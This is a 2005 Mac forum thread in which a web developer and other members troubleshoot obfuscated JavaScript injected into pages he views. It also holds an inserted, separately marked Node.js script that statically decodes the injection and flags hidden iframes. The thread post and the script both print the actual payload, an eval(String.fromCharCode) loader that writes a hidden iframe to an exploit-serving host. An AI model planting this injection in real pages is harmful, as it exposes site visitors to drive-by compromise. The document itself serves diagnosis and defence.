Do I have a real virus? Oh geezus...

Discussion in 'General Mac Discussion' started by jvaska, Mar 4, 2005.

  1. macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #1
    Years ago there was a famous virus that had something to do with http://padonack.info...

    When I'm surfing my own site, sometimes mysterious JavaScript inserts itself into the beginning of my document (I can tell by watching the activity window in Safari). This is happening on plain HTML pages that have no includes or anything. I've been a web dev since '95 so I know a few things...but I can't explain this yet.

    Except, that it's from my own computer. Both computers on my network are having the same problem (outside computers are not).

    I would venture that either I have a real virus on my machines or it's on my router (which I'm trying to find the manual for).

    Kind of worried...it's clear that they are accessing info via a java applet on their end...at a page named 'xxx.htm'...

    Anybody else ever see something like this on their end?
     
  2. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #2
    I'm sorry, but I have no idea what you're talking about... unless your webserver (Apache?) adds something, or you subscribe to an ad service (or whatever), then JavaScript does not insert itself into pages...

    If you're running this on Macs with OS X (which you don't say anything about, but I'll assume you are), it's highly unlikely a virus is to blame, you'd actually have the first known infected machines...
     
  3. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #3
    Sorry, I'm freaking out here...

    I'm on OSX 10.3.7 using Safari 1.2.4...

    My Apache is not configured to add anything. My AdBlock has never posed any problems of any sort...

    My webhost claims it's me...and from what I can determine, the problem is coming from my end of things (since others are not experiencing the problem while visiting my site).

    Is it possible that the router could be doing this? I don't know much about them...

    Trying to figure this out...is there a way with Apple Firewall to block outgoing communications with a particular ip address? I can't find this...
     
  4. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #4
    I'm surfing with Adblock.css and my plugins turned off and it's still happening. And with Firefox too...

    This is not good...

    Code:
    <script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script>
    which spells out:
    document.write('<iframe height=1 width=1 src=http://padonak.info/fa/ ></iframe>');

    It does this on static html pages too...
     
  5. macrumors 65816

    broken_keyboard

    Joined:
    Apr 19, 2004
    Location:
    Secret Moon base
    #5
    From what I can see it will execute the following:

    document.write('<iframe height=1 width=1 src=http://padonak.info/fa/ ></iframe>');

    Searching the web, it seems that site may contain a jar file that uses a JVM exploit to compromise your machine.
     
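The decoding broken_keyboard describes can be done without ever executing the script, which matters here because the iframe target is suspected of serving a browser exploit. What follows is an added example, not code from the thread or from any poster: a small Node.js scanner that finds eval(String.fromCharCode(...)) calls in an HTML document, decodes the character codes itself, and reports any iframe the decoded payload would write, along with whether it is sized to be invisible. SAMPLE_PAGE is constructed for this example around the exact script quoted in post #4; the function names are the example's own. It recognises only this one obfuscation pattern.

```javascript
// Added example: static decode of eval(String.fromCharCode(...)) obfuscation.
// Nothing in the page is executed; the char codes are decoded as data only.

// Constructed sample page. The <script> is the one posted in the thread.
const SAMPLE_PAGE = `<html><head><title>test</title></head><body>
<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))</script>
<p>hello</p></body></html>`;

// Find every eval(String.fromCharCode(n,n,...)) and turn the code list back
// into the string the attacker wanted eval() to run. Returns the byte offset
// of each match so the injection point in the page can be located.
function decodeFromCharCode(html) {
  const re = /eval\(\s*String\.fromCharCode\(\s*([\d\s,]+?)\s*\)\s*\)/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const codes = m[1]
      .split(',')
      .map((s) => parseInt(s.trim(), 10))
      .filter(Number.isInteger);
    out.push({ offset: m.index, decoded: String.fromCharCode(...codes) });
  }
  return out;
}

// Pull every <iframe> out of a decoded payload and parse its attributes.
// Attribute values may be double-quoted, single-quoted or bare, as in the
// sample (src=http://... with no quotes). A 1x1 or smaller frame is flagged
// as hidden, the classic drive-by pattern.
function extractIframes(decoded) {
  const iframes = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(decoded)) !== null) {
    const attrs = {};
    const attrRe = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
    let a;
    while ((a = attrRe.exec(m[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    const width = parseInt(attrs.width, 10);
    const height = parseInt(attrs.height, 10);
    iframes.push({
      src: attrs.src,
      width,
      height,
      hidden: width <= 1 || height <= 1,
    });
  }
  return iframes;
}

// One finding per iframe that an obfuscated eval would have written.
function scanPage(html) {
  const findings = [];
  for (const { offset, decoded } of decodeFromCharCode(html)) {
    for (const frame of extractIframes(decoded)) {
      findings.push({ offset, decoded, ...frame });
    }
  }
  return findings;
}

console.log(JSON.stringify(scanPage(SAMPLE_PAGE), null, 2));
```

Run against a copy of the page saved from each affected machine (curl, or the browser's "Save Page As") and against the same URL pulled by a machine that does not see the problem. If the finding is present in the saved bytes on the affected machines only, the script is being added somewhere between the webhost and those browsers, which is exactly the line the thread is trying to draw between a server-side problem and a local one.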
  6. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #6
    Yes, that's why I'm pretty freaked out by this... If you search on padonak and hangup you'll find more info...

    I'm trying to get the webhost to dig deeper into the matter but yesterday they flat out said it's me, not them.

    Actually, if there are any mac people out there who might be able to take a look at this - just to see if they can get the same javascript code that I'm getting perhaps they could IM me?

    Thanks...
     
  7. macrumors G4

    Applespider

    Joined:
    Jan 20, 2004
    Location:
    looking through rose-tinted spectacles...
    #7
    I'm on my work PC at the moment but did find some info about recent padonak attacks that you (or others) might find useful. It appears that its payload is Windows specific but that on some PCs it was getting round Norton etc.

    This seems to be the most common explanation - not sure if it triggers anything with you. Most people say that it ended up being installed onto their webserver, particularly when they ran forum software. Posting comments on the folder led to the malicious include.

    http://msmvps.com/donna/archive/2004/07/03/9463.aspx

    Good luck
     
  8. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #8
    From this site:
    Sounds very much like a Windows problem, first and foremost... how it can affect a Mac is beyond me, even more after skimming through this forum...

    Maybe this is a good time to actually run Virex or another AV software and see what they find... ;) ...or ask if your Webservice runs on a PC...?
     
  9. macrumors 65816

    redeye be

    Joined:
    Jan 27, 2005
    Location:
    BXL
    #9
    You could always call this guy and ask him what's up
    if it is a virus you would make the history books! Wouldn't that be great? :eek:

    Good luck.
     
  10. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #10
    Yep...the problem I have is that it's interfering with my css for whatever reason. I can see the iframe loading onto the page as it's leaving a little space...

    I don't have any kind of system for people to insert comments, etc onto my site...I'm not running a blog...

    So, do I breathe a little easier thinking that it's something server-side and not me? I hope so...I don't want to be the first...

    Thanks...
     
  11. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #11
    By the way: What is the address to your site? It would be interesting to see first hand...
     
  12. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #12
    I really don't like putting my url into forums...IM me on ichat and I'll give you the link...
     
  13. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #13
    I don't really get that, why have a secret homepage...? :rolleyes:

    But, anyhow, what I really want to know is the system your page is running on... Can you run your homepage through "What's that site running?" (it needs the whole URL, including the http://)...?

    My site (http://www.geek.no/), according to this test, runs on Linux, with an Apache/2.0.51 (Debian GNU/Linux) DAV/2 FrontPage/5.0.2.2635 PHP/4.3.8-12 mod_ssl/2.0.51 OpenSSL/0.9.7d webserver which is owned by Dataguard AS

    Now if your webhost runs on an OS in the Windows family, and maybe even an IIS server, then we have a very strong suspect, and your machine is most likely as healthy as ever... ;)
     
  14. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #14
    It's not secret, I just don't want to post it in a forum. I never do...

    Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
     
  15. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #15
    Fair enough... ;)

    Hmmm... quite a little problem this... have you tried a search for a proc.jar file...?

    And, what happens if you make a REALLY simple html file and upload that... does that too suddenly appear to have a foreign iframe in it...?
     
  16. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #16
    Don't have proc.jar on my system (or search doesn't find it)...very simple html files do have the iframe...

    Normally, my support is very fast. They are clearly thinking this one over before they get back to me. Fingers crossed they find the culprit...

    Thanks, v
     
  17. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #17
    Well, if it didn't have an iframe when you viewed it through localhost on your own machine, and therefore has to be clean when leaving your machine, then it's most likely something that gets added by your webhost's server...
     
  18. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #18
    Ok, here's an idea: Make a simple, but typical, html page, with a likewise simple css file. E-mail them to me at einstein<at>c2i<dot>net with a specific Subject (that's my "spam" account so most incoming mail from unknowns will be caught by the junk filter) and I'll upload them on my site and post back the link. If that's clean and your webhost still claims it's you, you can give them that link and say: Why isn't the iframe/script added when my file is uploaded here, then...???
     
  19. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #19
    Confirmed...this is a local issue...trying to go forward from here...

    Hope this is not a virus...

    It's affecting Safari and Firefox...not IE...
     
  20. macrumors G4

    Joined:
    Jul 17, 2002
    Location:
    USA
    #20
    You do not have a virus. If you did, you would be the first MacOS X user to get one. The only way for that to happen is for you to have written it, which you did not. At any rate, I don't entirely understand the nature of your problem. However, in the last couple of weeks, I have heard of ISPs inserting pop-ups between websites and surfers without the cooperation of the websites. If your site is hosted on your local computer, you can disconnect your computer from the 'net to see if the mysterious code disappears.
     
  21. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #21
    The same problem is on my two machines...I hate to say this...but is it?

    I'm not sure what to do right now. Should I just backup and reinstall?

    Oh geezus...
     
  22. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #22
    Site is not hosted locally...

    Would a host insert javascript that clearly drives to a documented hack site?

    Nobody can reproduce this. PC's and Mac's now...nobody else has this except for me. On two machines in my network...
     
  23. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #23
    Let's see if we can't find the problem (if it really is local, which I strongly doubt; have you checked your ISP...?):
    Do you have any "funny" plugins/addons/extensions that you use, either installed directly in your browser (like the Adblock extension in Firefox) or something in your home folder ~/Library/Internet Plug-Ins or systemwide /Library/Internet Plug-Ins ?
     
  24. Moderator emeritus

    Mitthrawnuruodo

    Joined:
    Mar 10, 2004
    Location:
    Bergen, Norway
    #24
    Some (free) hosts add a script (or some sort of frame) to all pages, making them display ads...
     
  25. thread starter macrumors 6502

    Joined:
    Feb 18, 2002
    Location:
    Haiti/NYC
    #25
    My host is not of that caliber...they wouldn't do that...
     